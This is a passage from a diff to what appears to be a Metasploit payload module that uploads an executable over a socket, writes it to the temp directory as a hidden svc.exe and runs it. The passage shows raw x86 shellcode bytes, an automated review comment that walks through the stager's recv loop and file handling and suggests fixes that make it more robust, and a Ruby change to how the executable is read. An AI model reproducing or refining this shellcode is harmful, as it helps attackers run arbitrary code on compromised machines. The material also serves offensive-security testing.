+ "\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80" +
+ "\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
 }
 ))
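Review bot: The loop that pulls the uploaded executable off the socket (`\x01\xC3\x29\xC6\x85\xF6\x75\xEC` after the second recv hash) never checks the recv() result, so a -1 on a dropped connection moves the write pointer below the VirtualAlloc'd buffer and inflates the remaining count, and the unconditional WriteFile that follows then commits whatever landed in memory to disk; a `test eax,eax` / `jle` exit before the add is the cheap fix. The dropped file is always `<GetTempPath>svc.exe` (`\xC7\x00\x73\x76\x63\x2E` / `\xC7\x40\x04\x65\x78\x65\x00`), opened with CREATE_ALWAYS and what look like FILE_ATTRIBUTE_HIDDEN|SYSTEM (the `\x6A\x06` push), so two concurrent sessions on one host overwrite each other's binary and a locked pre-existing file makes CreateFileA fail with a handle that is then used unchecked. The module description still reads only 'Uploads an executable and runs it'; it should say that the file is written to the temp directory as svc.exe and removed after the child exits (WaitForSingleObject followed by what appears to be DeleteFileA on the saved path), since that is the on-disk artifact an operator has to account for. The `'EXITFUNC'` offset moving from 385 to 368 has no comment tying it to the `mov ebx, <hash>` (`\xBB\xE0\x1D\x2A\x0A`) near the end of the blob, so it will have to be recounted by hand on the next rebuild.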
@@ -73,7 +72,12 @@ module Metasploit3
 #
 def handle_connection_stage(conn)
 begin
- data = ::IO.read(datastore['PEXEC'])
+ # bug fix for: data = ::IO.read(datastore['PEXEC'])
+ # the above does not return the entire contents
+ data = ""
+ File.open( datastore['PEXEC'], "rb" ) { |f|
+ data += f.read
+ }
 rescue
 print_error("Failed to read executable: #{$!}")